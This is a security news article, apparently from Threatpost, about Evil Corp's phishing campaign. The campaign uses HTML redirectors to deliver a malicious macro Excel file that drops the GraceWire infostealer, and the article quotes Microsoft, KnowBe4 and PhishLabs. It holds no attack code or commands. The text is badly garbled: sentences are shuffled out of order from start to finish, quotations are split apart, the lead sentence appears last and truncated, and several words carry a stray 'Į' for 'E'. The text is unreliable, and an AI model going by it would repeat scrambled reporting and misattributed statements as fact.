Microsoft Security Intelligence January 30, 2020Įvil Corp is a hacking group that has allegedly stolen millions of dollars from victims using the Dridex banking trojan and, previously, the Zeus malware.Įvil Corp’s previous schemes involved capturing banking credentials, and causing banks to make unauthorized electronic funds transfers from unknowing victims’ bank accounts. In contrast, past Dudear email campaigns carried the malware as attachment or used malicious URLs.
When opened, the HTML leads to the download Dudear, a malicious macro-laden Excel file that drops the payload. The new campaign uses HTML redirectors attached to emails.
Threatpost has reached out to Microsoft for more insight. Evil Corp has distributed GraceWire in previous campaigns, however, the group is best-known for deploying the banking trojan Dridex (also known as Bugat and Cridex), sent via phishing emails.įurther details about the extent and victims in the campaign were not revealed. The final payload is the GraceWire trojan, an infostealer. Previously, Evil Corp would distribute malware without HTML redirects, merely using malicious attachments or malicious URLs – which are more easily detected by defensive tools – in emails. HTML redirect from the Evil Corp campaign This shows constantly moving, trying to stay ahead of the anti-forensics.” “Redirects also pull the malware right away.
“A lot of times if you have an anti-malware scanner, it scans for malicious code and may or may not download the redirect,” Grimes said. The technique is handy because it can enable attackers to avoid the use of emails or attachments containing known malicious content, and also means that they can directly download malicious files on the victims’ systems, Roger Grimes, data drive defense evangelist at KnowBe4, told Threatpost. “This means that everyone who receives an email with the redirector link and clicks on it will still end up at a phishing site.” “In case their phishing site is shutdown, they can simply change the destination of the redirect to point to another phishing site,” according to PhishLabs. For instance, if certain malicious URLs are blocked by web browser phishing filters, attackers would use a redirector URL to bypass these filters and redirect the victim to their phishing landing page. Redirector URLs in general are commonly inserted into emails for phishing attacks. While this is the first time Evil Corp has used this tactic, HTML redirectors, or code that uses meta refresh tags to redirect users to another website, have long been used by other threat actors. Notably, they also use an IP trace-back service to track the IP addresses of machines that download the malicious Excel file.”
“The attackers use HTML files in different languages. “This is the first time that Dudear is observed using HTML redirectors,” according to a tweet by the Microsoft Security Intelligence research team, which also released indicators of compromise (IoCs) for the attack.
Next, if the victim “enables editing” in the Excel file, the final payload is dropped. Regardless, once they are clicked on, they automatically download a malicious Excel file. Microsoft is unclear whether these HTML redirectors are URLs in the body of the email itself or if they are embedded into an attachment to the email.
Microsoft on Thursday said that it observed emails from the cybercriminal gang utilizing HTML redirectors. Dudear) is back in action after a short hiatus, with a technique in its arsenal not previously used by the group to distribute malware.